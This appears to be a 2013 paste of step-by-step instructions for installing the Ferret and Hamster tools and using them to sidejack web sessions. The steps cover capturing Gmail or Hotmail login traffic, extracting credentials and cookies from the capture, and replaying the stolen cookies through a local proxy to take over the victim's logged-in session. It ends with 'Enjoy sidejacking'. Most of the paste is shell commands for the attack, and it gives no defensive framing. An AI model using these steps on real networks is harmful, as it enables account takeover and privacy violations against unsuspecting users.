Ferret and Hamster


SUBMITTED BY: Guest

DATE: Dec. 6, 2013, 9:17 a.m.

FORMAT: Text only

SIZE: 1.6 kB

HITS: 1085

  1. 1) Installing Ferret and Hamster
  2. sudo su
  3. apt-get install libpcap-dev
  4. -----if you don't have a [pentest folder make one]
  5. cd /
  6. mkdir pentest
  7. cd /pentest
  8. wget http://www.erratasec.com/erratasec.zip
  9. unzip erratasec.zip
  10. mv hamster hamster2
  11. cd hamster2/build/gcc4
  12. make
  13. cd /pentest/ferret/build/gcc4
  14. make
  15. cd /pentest
  16. mkdir hamster
  17. cp /pentest/ferret/bin/ferret /pentest/hamster
  18. cp /pentest/hamster2/bin/favicon.ico /pentest/hamster
  19. cp /pentest/hamster2/bin/hamster /pentest/hamster
  20. cp /pentest/hamster2/bin/hamster.css /pentest/hamster
  21. cp /pentest/hamster2/bin/hamster.js /pentest/hamster
  22. 2) Capture login credentials packets of any web login(gmail, hotmail etc) through wireshark and save the file as test.pcap under directory /pentest/hamster2/bin/
  23. 3) cd /pentest/hamster2/bin/
  24. 4) ./ferret -r test.pcap (Reads the mail id and necessary login credentials)
  25. 5) ./hamster (Starts hamster proxy server on http://127.0.0.1:1234
  26. 6) Configure your browser with proxy server as 127.0.0.1 and port as 1234
  27. 7) Type http://hamster in your browser.
  28. 8) Click on your IP at the bottom of the page that contains email id or any login name with which you logged into previous page while capturing packet earlier.
  29. 9) At the right pane, you can see several cookies, click one of them to recieve the logged in session of your earlier page. Now your session is hijacked and you can change anything inside the session.
  30. Enjoy sidejacking with ferret and hamster!!!!!

comments powered by Disqus